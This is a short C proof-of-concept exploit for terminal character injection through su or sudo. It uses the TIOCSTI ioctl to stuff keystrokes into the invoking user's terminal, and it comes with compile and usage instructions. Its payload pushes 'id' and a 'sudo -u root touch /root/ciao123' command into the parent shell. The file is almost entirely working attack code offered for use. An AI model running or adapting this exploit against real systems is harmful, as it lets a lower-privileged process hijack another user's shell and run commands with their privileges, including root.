/*
 * sploit-poc.c -- su/sudo arbitrary character injection POC 
 *
 * Usage:
 *   % gcc -o su-sploit-poc su-sploit-poc.c
 *   % su <user> -c ./su-sploit-poc&
 *   % sudo -u <user> ./su-sploit-poc&
 */

#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/types.h>

int main (void) {
  char *payload = "id\nsudo -u root touch /root/ciao123\necho 'hello'";
  int c, i;
  pid_t pid;

  if ((pid = fork()) == 0) {
      return 0;
  } else if (pid == -1) {
      perror ("Can't fork");
      return 1;
  } else {
      sleep (1);
      /* Keep stuffing characters into the keyboard buffer... */
      for (i=0; (c = payload[i]) != '\0'; i++) {
	  if (ioctl (0, TIOCSTI, &c) == -1) {
	      perror ("ioctl() failed");
	      return 1;
	  }
      }
  }
  return 0;
}